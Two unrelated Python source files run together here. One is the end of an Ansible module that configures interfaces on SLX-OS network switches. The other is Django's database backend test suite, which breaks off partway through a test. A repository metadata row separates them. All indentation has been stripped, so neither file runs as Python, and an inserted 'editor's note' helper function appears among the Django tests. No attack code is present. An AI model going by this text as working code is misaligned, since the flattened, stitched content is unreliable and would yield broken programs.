from ansible.module_utils.connection import exec_command
from ansible.module_utils.network.slxos.slxos import get_config, load_config
from ansible.module_utils.network.common.config import NetworkConfig
from ansible.module_utils.network.common.utils import conditional, remove_default_spec
def validate_mtu(value, module):
if value and not 1548 <= int(value) <= 9216:
module.fail_json(msg='mtu must be between 1548 and 9216')
def validate_param_values(module, obj, param=None):
if param is None:
param = module.params
for key in obj:
# validate the param value (if validator func exists)
validator = globals().get('validate_%s' % key)
if callable(validator):
validator(param.get(key), module)
def parse_shutdown(configobj, name):
cfg = configobj['interface %s' % name]
cfg = '\n'.join(cfg.children)
match = re.search(r'^shutdown', cfg, re.M)
if match:
return True
else:
return False
def parse_config_argument(configobj, name, arg=None):
cfg = configobj['interface %s' % name]
cfg = '\n'.join(cfg.children)
match = re.search(r'%s (.+)$' % arg, cfg, re.M)
if match:
return match.group(1)
def search_obj_in_list(name, lst):
for o in lst:
if o['name'] == name:
return o
return None
def add_command_to_interface(interface, cmd, commands):
if interface not in commands:
commands.append(interface)
commands.append(cmd)
def map_config_to_obj(module):
config = get_config(module)
configobj = NetworkConfig(indent=1, contents=config)
match = re.findall(r'^interface (\S+ \S+)', config, re.M)
if not match:
return list()
instances = list()
for item in set(match):
obj = {
'name': item,
'description': parse_config_argument(configobj, item, 'description'),
'speed': parse_config_argument(configobj, item, 'speed'),
'mtu': parse_config_argument(configobj, item, 'mtu'),
'disable': True if parse_shutdown(configobj, item) else False,
'state': 'present'
}
instances.append(obj)
return instances
def map_params_to_obj(module):
obj = []
aggregate = module.params.get('aggregate')
if aggregate:
for item in aggregate:
for key in item:
if item.get(key) is None:
item[key] = module.params[key]
validate_param_values(module, item, item)
d = item.copy()
if d['enabled']:
d['disable'] = False
else:
d['disable'] = True
obj.append(d)
else:
params = {
'name': module.params['name'],
'description': module.params['description'],
'speed': module.params['speed'],
'mtu': module.params['mtu'],
'state': module.params['state'],
'delay': module.params['delay'],
'tx_rate': module.params['tx_rate'],
'rx_rate': module.params['rx_rate'],
'neighbors': module.params['neighbors']
}
validate_param_values(module, params)
if module.params['enabled']:
params.update({'disable': False})
else:
params.update({'disable': True})
obj.append(params)
return obj
def map_obj_to_commands(updates):
commands = list()
want, have = updates
args = ('speed', 'description', 'mtu')
for w in want:
name = w['name']
disable = w['disable']
state = w['state']
obj_in_have = search_obj_in_list(name, have)
interface = 'interface ' + name
if state == 'absent' and obj_in_have:
commands.append('no ' + interface)
elif state in ('present', 'up', 'down'):
if obj_in_have:
for item in args:
candidate = w.get(item)
running = obj_in_have.get(item)
if candidate != running:
if candidate:
cmd = item + ' ' + str(candidate)
add_command_to_interface(interface, cmd, commands)
if disable and not obj_in_have.get('disable', False):
add_command_to_interface(interface, 'shutdown', commands)
elif not disable and obj_in_have.get('disable', False):
add_command_to_interface(interface, 'no shutdown', commands)
else:
commands.append(interface)
for item in args:
value = w.get(item)
if value:
commands.append(item + ' ' + str(value))
if disable:
commands.append('no shutdown')
return commands
def check_declarative_intent_params(module, want, result):
failed_conditions = []
have_neighbors = None
for w in want:
want_state = w.get('state')
want_tx_rate = w.get('tx_rate')
want_rx_rate = w.get('rx_rate')
want_neighbors = w.get('neighbors')
if want_state not in ('up', 'down') and not want_tx_rate and not want_rx_rate and not want_neighbors:
continue
if result['changed']:
sleep(w['delay'])
command = 'show interface %s' % w['name']
rc, out, err = exec_command(module, command)
if rc != 0:
module.fail_json(msg=to_text(err, errors='surrogate_then_replace'), command=command, rc=rc)
if want_state in ('up', 'down'):
match = re.search(r'%s (\w+)' % 'line protocol is', out, re.M)
have_state = None
if match:
have_state = match.group(1)
if have_state is None or not conditional(want_state, have_state.strip()):
failed_conditions.append('state ' + 'eq(%s)' % want_state)
if want_tx_rate:
match = re.search(r'%s (\d+)' % 'Output', out, re.M)
have_tx_rate = None
if match:
have_tx_rate = match.group(1)
if have_tx_rate is None or not conditional(want_tx_rate, have_tx_rate.strip(), cast=int):
failed_conditions.append('tx_rate ' + want_tx_rate)
if want_rx_rate:
match = re.search(r'%s (\d+)' % 'Input', out, re.M)
have_rx_rate = None
if match:
have_rx_rate = match.group(1)
if have_rx_rate is None or not conditional(want_rx_rate, have_rx_rate.strip(), cast=int):
failed_conditions.append('rx_rate ' + want_rx_rate)
if want_neighbors:
have_host = []
have_port = []
if have_neighbors is None:
rc, have_neighbors, err = exec_command(module, 'show lldp neighbors detail')
if rc != 0:
module.fail_json(msg=to_text(err, errors='surrogate_then_replace'), command=command, rc=rc)
if have_neighbors:
lines = have_neighbors.strip().split('Local Interface: ')
short_name = w['name'].replace('Ethernet', 'Eth')
for line in lines:
field = line.split('\n')
if field[0].split('(')[0].strip() == short_name:
for item in field:
if item.startswith('System Name:'):
have_host.append(item.split(':')[1].strip())
if item.startswith('Remote Interface:'):
have_port.append(item.split(':')[1].split('(')[0].strip())
for item in want_neighbors:
host = item.get('host')
port = item.get('port')
if host and host not in have_host:
failed_conditions.append('host ' + host)
if port and port not in have_port:
failed_conditions.append('port ' + port)
return failed_conditions
def main():
""" main entry point for module execution
"""
neighbors_spec = dict(
host=dict(),
port=dict()
)
element_spec = dict(
name=dict(),
description=dict(),
speed=dict(),
mtu=dict(),
enabled=dict(default=True, type='bool'),
tx_rate=dict(),
rx_rate=dict(),
neighbors=dict(type='list', elements='dict', options=neighbors_spec),
delay=dict(default=10, type='int'),
state=dict(default='present',
choices=['present', 'absent', 'up', 'down'])
)
aggregate_spec = deepcopy(element_spec)
aggregate_spec['name'] = dict(required=True)
# remove default in aggregate spec, to handle common arguments
remove_default_spec(aggregate_spec)
argument_spec = dict(
aggregate=dict(type='list', elements='dict', options=aggregate_spec),
)
argument_spec.update(element_spec)
required_one_of = [['name', 'aggregate']]
mutually_exclusive = [['name', 'aggregate']]
module = AnsibleModule(argument_spec=argument_spec,
required_one_of=required_one_of,
mutually_exclusive=mutually_exclusive,
supports_check_mode=True)
warnings = list()
result = {'changed': False}
if warnings:
result['warnings'] = warnings
want = map_params_to_obj(module)
have = map_config_to_obj(module)
commands = map_obj_to_commands((want, have))
result['commands'] = commands
if commands:
if not module.check_mode:
load_config(module, commands)
result['changed'] = True
failed_conditions = check_declarative_intent_params(module, want, result)
if failed_conditions:
msg = 'One or more conditional statements have not been satisfied'
module.fail_json(msg=msg, failed_conditions=failed_conditions, changed=result['changed'])
module.exit_json(**result)
if __name__ == '__main__':
main()
|
RossBrunton/django
|
refs/heads/master
|
tests/backends/tests.py
|
77
|
# -*- coding: utf-8 -*-
# Unit and doctests for specific database backends.
from __future__ import unicode_literals
import copy
import datetime
import re
import threading
import unittest
import warnings
from decimal import Decimal, Rounded
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.management.color import no_style
from django.db import (
DEFAULT_DB_ALIAS, DatabaseError, IntegrityError, connection, connections,
reset_queries, transaction,
)
from django.db.backends.base.base import BaseDatabaseWrapper
from django.db.backends.postgresql_psycopg2 import version as pg_version
from django.db.backends.signals import connection_created
from django.db.backends.utils import CursorWrapper, format_number
from django.db.models import Avg, StdDev, Sum, Variance
from django.db.models.sql.constants import CURSOR
from django.db.utils import ConnectionHandler
from django.test import (
SimpleTestCase, TestCase, TransactionTestCase, mock, override_settings,
skipIfDBFeature, skipUnlessDBFeature,
)
from django.test.utils import str_prefix
from django.utils import six
from django.utils.six.moves import range
from . import models
class DummyBackendTest(SimpleTestCase):
def test_no_databases(self):
"""
        Test that an empty DATABASES setting defaults to the dummy backend.
"""
DATABASES = {}
conns = ConnectionHandler(DATABASES)
self.assertEqual(conns[DEFAULT_DB_ALIAS].settings_dict['ENGINE'],
'django.db.backends.dummy')
with self.assertRaises(ImproperlyConfigured):
conns[DEFAULT_DB_ALIAS].ensure_connection()
@unittest.skipUnless(connection.vendor == 'oracle', "Test only for Oracle")
class OracleTests(unittest.TestCase):
def test_quote_name(self):
# Check that '%' chars are escaped for query execution.
name = '"SOME%NAME"'
quoted_name = connection.ops.quote_name(name)
self.assertEqual(quoted_name % (), name)
def test_dbms_session(self):
# If the backend is Oracle, test that we can call a standard
# stored procedure through our cursor wrapper.
from django.db.backends.oracle.base import convert_unicode
with connection.cursor() as cursor:
cursor.callproc(convert_unicode('DBMS_SESSION.SET_IDENTIFIER'),
[convert_unicode('_django_testing!')])
def test_cursor_var(self):
# If the backend is Oracle, test that we can pass cursor variables
# as query parameters.
from django.db.backends.oracle.base import Database
with connection.cursor() as cursor:
var = cursor.var(Database.STRING)
cursor.execute("BEGIN %s := 'X'; END; ", [var])
self.assertEqual(var.getvalue(), 'X')
def test_long_string(self):
# If the backend is Oracle, test that we can save text longer
# than 4000 chars and read it back properly
with connection.cursor() as cursor:
cursor.execute('CREATE TABLE ltext ("TEXT" NCLOB)')
long_str = ''.join(six.text_type(x) for x in range(4000))
cursor.execute('INSERT INTO ltext VALUES (%s)', [long_str])
cursor.execute('SELECT text FROM ltext')
row = cursor.fetchone()
self.assertEqual(long_str, row[0].read())
cursor.execute('DROP TABLE ltext')
def test_client_encoding(self):
# If the backend is Oracle, test that the client encoding is set
# correctly. This was broken under Cygwin prior to r14781.
connection.ensure_connection()
self.assertEqual(connection.connection.encoding, "UTF-8")
self.assertEqual(connection.connection.nencoding, "UTF-8")
def test_order_of_nls_parameters(self):
# an 'almost right' datetime should work with configured
# NLS parameters as per #18465.
with connection.cursor() as cursor:
query = "select 1 from dual where '1936-12-29 00:00' < sysdate"
# Test that the query succeeds without errors - pre #18465 this
# wasn't the case.
cursor.execute(query)
self.assertEqual(cursor.fetchone()[0], 1)
@unittest.skipUnless(connection.vendor == 'sqlite', "Test only for SQLite")
class SQLiteTests(TestCase):
longMessage = True
def test_autoincrement(self):
"""
Check that auto_increment fields are created with the AUTOINCREMENT
keyword in order to be monotonically increasing. Refs #10164.
"""
with connection.schema_editor(collect_sql=True) as editor:
editor.create_model(models.Square)
statements = editor.collected_sql
match = re.search('"id" ([^,]+),', statements[0])
self.assertIsNotNone(match)
self.assertEqual('integer NOT NULL PRIMARY KEY AUTOINCREMENT',
match.group(1), "Wrong SQL used to create an auto-increment "
"column on SQLite")
def test_aggregation(self):
"""
#19360: Raise NotImplementedError when aggregating on date/time fields.
"""
for aggregate in (Sum, Avg, Variance, StdDev):
self.assertRaises(
NotImplementedError,
models.Item.objects.all().aggregate, aggregate('time'))
self.assertRaises(
NotImplementedError,
models.Item.objects.all().aggregate, aggregate('date'))
self.assertRaises(
NotImplementedError,
models.Item.objects.all().aggregate, aggregate('last_modified'))
self.assertRaises(
NotImplementedError,
models.Item.objects.all().aggregate,
**{'complex': aggregate('last_modified') + aggregate('last_modified')})
@unittest.skipUnless(connection.vendor == 'postgresql', "Test only for PostgreSQL")
class PostgreSQLTests(TestCase):
def assert_parses(self, version_string, version):
self.assertEqual(pg_version._parse_version(version_string), version)
def test_parsing(self):
"""Test PostgreSQL version parsing from `SELECT version()` output"""
self.assert_parses("PostgreSQL 9.3 beta4", 90300)
self.assert_parses("PostgreSQL 9.3", 90300)
self.assert_parses("EnterpriseDB 9.3", 90300)
self.assert_parses("PostgreSQL 9.3.6", 90306)
self.assert_parses("PostgreSQL 9.4beta1", 90400)
self.assert_parses("PostgreSQL 9.3.1 on i386-apple-darwin9.2.2, compiled by GCC i686-apple-darwin9-gcc-4.0.1 (GCC) 4.0.1 (Apple Inc. build 5478)", 90301)
def test_nodb_connection(self):
"""
Test that the _nodb_connection property falls back to the default connection
database when access to the 'postgres' database is not granted.
"""
def mocked_connect(self):
if self.settings_dict['NAME'] is None:
raise DatabaseError()
return ''
nodb_conn = connection._nodb_connection
self.assertIsNone(nodb_conn.settings_dict['NAME'])
# Now assume the 'postgres' db isn't available
del connection._nodb_connection
with warnings.catch_warnings(record=True) as w:
with mock.patch('django.db.backends.base.base.BaseDatabaseWrapper.connect',
side_effect=mocked_connect, autospec=True):
nodb_conn = connection._nodb_connection
del connection._nodb_connection
self.assertIsNotNone(nodb_conn.settings_dict['NAME'])
self.assertEqual(nodb_conn.settings_dict['NAME'], settings.DATABASES[DEFAULT_DB_ALIAS]['NAME'])
# Check that a RuntimeWarning has been emitted
self.assertEqual(len(w), 1)
self.assertEqual(w[0].message.__class__, RuntimeWarning)
def test_version_detection(self):
"""Test PostgreSQL version detection"""
# Helper mocks
class CursorMock(object):
"Very simple mock of DB-API cursor"
def execute(self, arg):
pass
def fetchone(self):
return ["PostgreSQL 9.3"]
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
pass
class OlderConnectionMock(object):
"Mock of psycopg2 (< 2.0.12) connection"
def cursor(self):
return CursorMock()
# psycopg2 < 2.0.12 code path
conn = OlderConnectionMock()
self.assertEqual(pg_version.get_version(conn), 90300)
def test_connect_and_rollback(self):
"""
PostgreSQL shouldn't roll back SET TIME ZONE, even if the first
transaction is rolled back (#17062).
"""
databases = copy.deepcopy(settings.DATABASES)
new_connections = ConnectionHandler(databases)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
# Ensure the database default time zone is different from
# the time zone in new_connection.settings_dict. We can
# get the default time zone by reset & show.
cursor = new_connection.cursor()
cursor.execute("RESET TIMEZONE")
cursor.execute("SHOW TIMEZONE")
db_default_tz = cursor.fetchone()[0]
new_tz = 'Europe/Paris' if db_default_tz == 'UTC' else 'UTC'
new_connection.close()
# Invalidate timezone name cache, because the setting_changed
# handler cannot know about new_connection.
del new_connection.timezone_name
# Fetch a new connection with the new_tz as default
# time zone, run a query and rollback.
with self.settings(TIME_ZONE=new_tz):
new_connection.set_autocommit(False)
cursor = new_connection.cursor()
new_connection.rollback()
# Now let's see if the rollback rolled back the SET TIME ZONE.
cursor.execute("SHOW TIMEZONE")
tz = cursor.fetchone()[0]
self.assertEqual(new_tz, tz)
finally:
new_connection.close()
def test_connect_non_autocommit(self):
"""
The connection wrapper shouldn't believe that autocommit is enabled
after setting the time zone when AUTOCOMMIT is False (#21452).
"""
databases = copy.deepcopy(settings.DATABASES)
databases[DEFAULT_DB_ALIAS]['AUTOCOMMIT'] = False
new_connections = ConnectionHandler(databases)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
# Open a database connection.
new_connection.cursor()
self.assertFalse(new_connection.get_autocommit())
finally:
new_connection.close()
def test_connect_isolation_level(self):
"""
Regression test for #18130 and #24318.
"""
from psycopg2.extensions import (
ISOLATION_LEVEL_READ_COMMITTED as read_committed,
ISOLATION_LEVEL_SERIALIZABLE as serializable,
)
# Since this is a django.test.TestCase, a transaction is in progress
# and the isolation level isn't reported as 0. This test assumes that
# PostgreSQL is configured with the default isolation level.
# Check the level on the psycopg2 connection, not the Django wrapper.
self.assertEqual(connection.connection.isolation_level, read_committed)
databases = copy.deepcopy(settings.DATABASES)
databases[DEFAULT_DB_ALIAS]['OPTIONS']['isolation_level'] = serializable
new_connections = ConnectionHandler(databases)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
# Start a transaction so the isolation level isn't reported as 0.
new_connection.set_autocommit(False)
# Check the level on the psycopg2 connection, not the Django wrapper.
self.assertEqual(new_connection.connection.isolation_level, serializable)
finally:
new_connection.close()
def _select(self, val):
with connection.cursor() as cursor:
cursor.execute("SELECT %s", (val,))
return cursor.fetchone()[0]
def test_select_ascii_array(self):
a = ["awef"]
b = self._select(a)
self.assertEqual(a[0], b[0])
def test_select_unicode_array(self):
a = ["ᄲawef"]
b = self._select(a)
self.assertEqual(a[0], b[0])
def test_lookup_cast(self):
from django.db.backends.postgresql_psycopg2.operations import DatabaseOperations
do = DatabaseOperations(connection=None)
for lookup in ('iexact', 'contains', 'icontains', 'startswith',
'istartswith', 'endswith', 'iendswith', 'regex', 'iregex'):
self.assertIn('::text', do.lookup_cast(lookup))
def test_correct_extraction_psycopg2_version(self):
from django.db.backends.postgresql_psycopg2.base import psycopg2_version
version_path = 'django.db.backends.postgresql_psycopg2.base.Database.__version__'
with mock.patch(version_path, '2.6.9'):
self.assertEqual(psycopg2_version(), (2, 6, 9))
with mock.patch(version_path, '2.5.dev0'):
self.assertEqual(psycopg2_version(), (2, 5))
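# Editor's note: a hedged, illustrative sketch (not Django's actual code) of the
# version parsing that test_correct_extraction_psycopg2_version above exercises:
# strip any non-numeric suffix such as ".dev0" and return an integer tuple.
def _sketch_psycopg2_version(version_string):
    match = re.match(r'(\d+)\.(\d+)(?:\.(\d+))?', version_string)
    return tuple(int(part) for part in match.groups() if part is not None)
# e.g. _sketch_psycopg2_version('2.6.9') == (2, 6, 9)
#      _sketch_psycopg2_version('2.5.dev0') == (2, 5)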
class DateQuotingTest(TestCase):
def test_django_date_trunc(self):
"""
Test the custom ``django_date_trunc`` method, in particular against
fields which clash with strings passed to it (e.g. 'year') - see
#12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
years = models.SchoolClass.objects.dates('last_updated', 'year')
self.assertEqual(list(years), [datetime.date(2010, 1, 1)])
def test_django_date_extract(self):
"""
Test the custom ``django_date_extract`` method, in particular against fields
which clash with strings passed to it (e.g. 'day') - see #12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
classes = models.SchoolClass.objects.filter(last_updated__day=20)
self.assertEqual(len(classes), 1)
@override_settings(DEBUG=True)
class LastExecutedQueryTest(TestCase):
def test_last_executed_query(self):
"""
last_executed_query should not raise an exception even if no previous
query has been run.
"""
cursor = connection.cursor()
connection.ops.last_executed_query(cursor, '', ())
def test_debug_sql(self):
list(models.Reporter.objects.filter(first_name="test"))
sql = connection.queries[-1]['sql'].lower()
self.assertIn("select", sql)
self.assertIn(models.Reporter._meta.db_table, sql)
def test_query_encoding(self):
"""
Test that last_executed_query() returns a Unicode string
"""
data = models.RawData.objects.filter(raw_data=b'\x00\x46 \xFE').extra(select={'föö': 1})
sql, params = data.query.sql_with_params()
cursor = data.query.get_compiler('default').execute_sql(CURSOR)
last_sql = cursor.db.ops.last_executed_query(cursor, sql, params)
self.assertIsInstance(last_sql, six.text_type)
@unittest.skipUnless(connection.vendor == 'sqlite',
"This test is specific to SQLite.")
def test_no_interpolation_on_sqlite(self):
# Regression for #17158
# This shouldn't raise an exception
query = "SELECT strftime('%Y', 'now');"
connection.cursor().execute(query)
self.assertEqual(connection.queries[-1]['sql'],
str_prefix("QUERY = %(_)s\"SELECT strftime('%%Y', 'now');\" - PARAMS = ()"))
class ParameterHandlingTest(TestCase):
def test_bad_parameter_count(self):
"An executemany call with too many/not enough parameters will raise an exception (Refs #12612)"
cursor = connection.cursor()
query = ('INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (
connection.introspection.table_name_converter('backends_square'),
connection.ops.quote_name('root'),
connection.ops.quote_name('square')
))
self.assertRaises(Exception, cursor.executemany, query, [(1, 2, 3)])
self.assertRaises(Exception, cursor.executemany, query, [(1,)])
# Unfortunately, the following tests would be good to run on all
# backends, but they break MySQL hard. Until #13711 is fixed, they can't be run
# everywhere (although they would be an effective test of #13711).
class LongNameTest(TransactionTestCase):
"""Long primary keys and model names can result in a sequence name
that exceeds the database limits, which will result in truncation
on certain databases (e.g., Postgres). The backend needs to use
the correct sequence name in last_insert_id and other places, so
check that it does. Refs #8901.
"""
available_apps = ['backends']
def test_sequence_name_length_limits_create(self):
"""Test creation of model with long name and long pk name doesn't error. Ref #8901"""
models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
def test_sequence_name_length_limits_m2m(self):
"""Test an m2m save of a model with a long name and a long m2m field name doesn't error as on Django >=1.2 this now uses object saves. Ref #8901"""
obj = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
rel_obj = models.Person.objects.create(first_name='Django', last_name='Reinhardt')
obj.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.add(rel_obj)
def test_sequence_name_length_limits_flush(self):
"""Test that sequence resetting as part of a flush with model with long name and long pk name doesn't error. Ref #8901"""
# A full flush is expensive for the test suite, so we dig into the
# internals to generate the likely offending SQL and run it manually
# Some convenience aliases
VLM = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
VLM_m2m = VLM.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.through
tables = [
VLM._meta.db_table,
VLM_m2m._meta.db_table,
]
sequences = [
{
'column': VLM._meta.pk.column,
'table': VLM._meta.db_table
},
]
cursor = connection.cursor()
for statement in connection.ops.sql_flush(no_style(), tables, sequences):
cursor.execute(statement)
class SequenceResetTest(TestCase):
def test_generic_relation(self):
"Sequence names are correct when resetting generic relations (Ref #13941)"
# Create an object with a manually specified PK
models.Post.objects.create(id=10, name='1st post', text='hello world')
# Reset the sequences for the database
cursor = connection.cursor()
commands = connections[DEFAULT_DB_ALIAS].ops.sequence_reset_sql(no_style(), [models.Post])
for sql in commands:
cursor.execute(sql)
# If we create a new object now, it should have a PK greater
# than the PK we specified manually.
obj = models.Post.objects.create(name='New post', text='goodbye world')
self.assertGreater(obj.pk, 10)
# This test needs to run outside of a transaction, otherwise closing the
# connection would implicitly rollback and cause problems during teardown.
class ConnectionCreatedSignalTest(TransactionTestCase):
available_apps = []
# Unfortunately with sqlite3 the in-memory test database cannot be closed,
# and so it cannot be re-opened during testing.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_signal(self):
data = {}
def receiver(sender, connection, **kwargs):
data["connection"] = connection
connection_created.connect(receiver)
connection.close()
connection.cursor()
self.assertIs(data["connection"].connection, connection.connection)
connection_created.disconnect(receiver)
data.clear()
connection.cursor()
self.assertEqual(data, {})
class EscapingChecks(TestCase):
"""
All tests in this test case are also run with settings.DEBUG=True in
EscapingChecksDebug test case, to also test CursorDebugWrapper.
"""
bare_select_suffix = connection.features.bare_select_suffix
def test_paramless_no_escaping(self):
cursor = connection.cursor()
cursor.execute("SELECT '%s'" + self.bare_select_suffix)
self.assertEqual(cursor.fetchall()[0][0], '%s')
def test_parameter_escaping(self):
cursor = connection.cursor()
cursor.execute("SELECT '%%', %s" + self.bare_select_suffix, ('%d',))
self.assertEqual(cursor.fetchall()[0], ('%', '%d'))
@unittest.skipUnless(connection.vendor == 'sqlite',
"This is an sqlite-specific issue")
def test_sqlite_parameter_escaping(self):
# '%s' escaping support for sqlite3 #13648
cursor = connection.cursor()
cursor.execute("select strftime('%s', date('now'))")
response = cursor.fetchall()[0][0]
# response should be a non-zero integer
self.assertTrue(int(response))
@override_settings(DEBUG=True)
class EscapingChecksDebug(EscapingChecks):
pass
class BackendTestCase(TransactionTestCase):
available_apps = ['backends']
def create_squares_with_executemany(self, args):
self.create_squares(args, 'format', True)
def create_squares(self, args, paramstyle, multiple):
cursor = connection.cursor()
opts = models.Square._meta
tbl = connection.introspection.table_name_converter(opts.db_table)
f1 = connection.ops.quote_name(opts.get_field('root').column)
f2 = connection.ops.quote_name(opts.get_field('square').column)
if paramstyle == 'format':
query = 'INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (tbl, f1, f2)
elif paramstyle == 'pyformat':
query = 'INSERT INTO %s (%s, %s) VALUES (%%(root)s, %%(square)s)' % (tbl, f1, f2)
else:
raise ValueError("unsupported paramstyle in test")
if multiple:
cursor.executemany(query, args)
else:
cursor.execute(query, args)
def test_cursor_executemany(self):
# Test cursor.executemany #4896
args = [(i, i ** 2) for i in range(-5, 6)]
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 11)
for i in range(-5, 6):
square = models.Square.objects.get(root=i)
self.assertEqual(square.square, i ** 2)
def test_cursor_executemany_with_empty_params_list(self):
# Test executemany with params=[] does nothing #4765
args = []
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 0)
def test_cursor_executemany_with_iterator(self):
# Test executemany accepts iterators #10320
args = iter((i, i ** 2) for i in range(-3, 2))
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 5)
args = iter((i, i ** 2) for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 9)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_execute_with_pyformat(self):
# Support pyformat style passing of parameters #10070
args = {'root': 3, 'square': 9}
self.create_squares(args, 'pyformat', multiple=False)
self.assertEqual(models.Square.objects.count(), 1)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_executemany_with_pyformat(self):
# Support pyformat style passing of parameters #10070
args = [{'root': i, 'square': i ** 2} for i in range(-5, 6)]
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 11)
for i in range(-5, 6):
square = models.Square.objects.get(root=i)
self.assertEqual(square.square, i ** 2)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_executemany_with_pyformat_iterator(self):
args = iter({'root': i, 'square': i ** 2} for i in range(-3, 2))
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 5)
args = iter({'root': i, 'square': i ** 2} for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 9)
def test_unicode_fetches(self):
# fetchone, fetchmany, fetchall return strings as unicode objects #6254
qn = connection.ops.quote_name
models.Person(first_name="John", last_name="Doe").save()
models.Person(first_name="Jane", last_name="Doe").save()
models.Person(first_name="Mary", last_name="Agnelline").save()
models.Person(first_name="Peter", last_name="Parker").save()
models.Person(first_name="Clark", last_name="Kent").save()
opts2 = models.Person._meta
f3, f4 = opts2.get_field('first_name'), opts2.get_field('last_name')
query2 = ('SELECT %s, %s FROM %s ORDER BY %s'
% (qn(f3.column), qn(f4.column), connection.introspection.table_name_converter(opts2.db_table),
qn(f3.column)))
cursor = connection.cursor()
cursor.execute(query2)
self.assertEqual(cursor.fetchone(), ('Clark', 'Kent'))
self.assertEqual(list(cursor.fetchmany(2)), [('Jane', 'Doe'), ('John', 'Doe')])
self.assertEqual(list(cursor.fetchall()), [('Mary', 'Agnelline'), ('Peter', 'Parker')])
def test_unicode_password(self):
old_password = connection.settings_dict['PASSWORD']
connection.settings_dict['PASSWORD'] = "françois"
try:
connection.cursor()
except DatabaseError:
# As password is probably wrong, a database exception is expected
pass
except Exception as e:
self.fail("Unexpected error raised with unicode password: %s" % e)
finally:
connection.settings_dict['PASSWORD'] = old_password
def test_database_operations_helper_class(self):
# Ticket #13630
self.assertTrue(hasattr(connection, 'ops'))
self.assertTrue(hasattr(connection.ops, 'connection'))
self.assertEqual(connection, connection.ops.connection)
def test_database_operations_init(self):
"""
Test that DatabaseOperations initialization doesn't query the database.
See #17656.
"""
with self.assertNumQueries(0):
connection.ops.__class__(connection)
def test_cached_db_features(self):
self.assertIn(connection.features.supports_transactions, (True, False))
self.assertIn(connection.features.supports_stddev, (True, False))
self.assertIn(connection.features.can_introspect_foreign_keys, (True, False))
def test_duplicate_table_error(self):
""" Test that creating an existing table returns a DatabaseError """
cursor = connection.cursor()
query = 'CREATE TABLE %s (id INTEGER);' % models.Article._meta.db_table
with self.assertRaises(DatabaseError):
cursor.execute(query)
def test_cursor_contextmanager(self):
"""
Test that cursors can be used as a context manager
"""
with connection.cursor() as cursor:
self.assertIsInstance(cursor, CursorWrapper)
# Both InterfaceError and ProgrammingError seem to be used when
# accessing a closed cursor (psycopg2 has InterfaceError, the rest seem
# to use ProgrammingError).
with self.assertRaises(connection.features.closed_cursor_error_class):
# cursor should be closed, so no queries should be possible.
cursor.execute("SELECT 1" + connection.features.bare_select_suffix)
@unittest.skipUnless(connection.vendor == 'postgresql',
"Psycopg2 specific cursor.closed attribute needed")
def test_cursor_contextmanager_closing(self):
# There isn't a generic way to test that cursors are closed, but
# psycopg2 offers us a way to check that via the closed attribute.
# So, run only on psycopg2 for that reason.
with connection.cursor() as cursor:
self.assertIsInstance(cursor, CursorWrapper)
self.assertTrue(cursor.closed)
# Unfortunately with sqlite3 the in-memory test database cannot be closed.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_is_usable_after_database_disconnects(self):
"""
Test that is_usable() doesn't crash when the database disconnects.
Regression for #21553.
"""
# Open a connection to the database.
with connection.cursor():
pass
# Emulate a connection close by the database.
connection._close()
# Even then is_usable() should not raise an exception.
try:
self.assertFalse(connection.is_usable())
finally:
# Clean up the mess created by connection._close(). Since the
# connection is already closed, this crashes on some backends.
try:
connection.close()
except Exception:
pass
@override_settings(DEBUG=True)
def test_queries(self):
"""
Test the documented API of connection.queries.
"""
with connection.cursor() as cursor:
reset_queries()
cursor.execute("SELECT 1" + connection.features.bare_select_suffix)
self.assertEqual(1, len(connection.queries))
self.assertIsInstance(connection.queries, list)
self.assertIsInstance(connection.queries[0], dict)
six.assertCountEqual(self, connection.queries[0].keys(), ['sql', 'time'])
reset_queries()
self.assertEqual(0, len(connection.queries))
# Unfortunately with sqlite3 the in-memory test database cannot be closed.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
@override_settings(DEBUG=True)
def test_queries_limit(self):
"""
Test that the backend doesn't store an unlimited number of queries.
Regression for #12581.
"""
old_queries_limit = BaseDatabaseWrapper.queries_limit
BaseDatabaseWrapper.queries_limit = 3
new_connections = ConnectionHandler(settings.DATABASES)
new_connection = new_connections[DEFAULT_DB_ALIAS]
# Initialize the connection and clear initialization statements.
with new_connection.cursor():
pass
new_connection.queries_log.clear()
try:
with new_connection.cursor() as cursor:
cursor.execute("SELECT 1" + new_connection.features.bare_select_suffix)
cursor.execute("SELECT 2" + new_connection.features.bare_select_suffix)
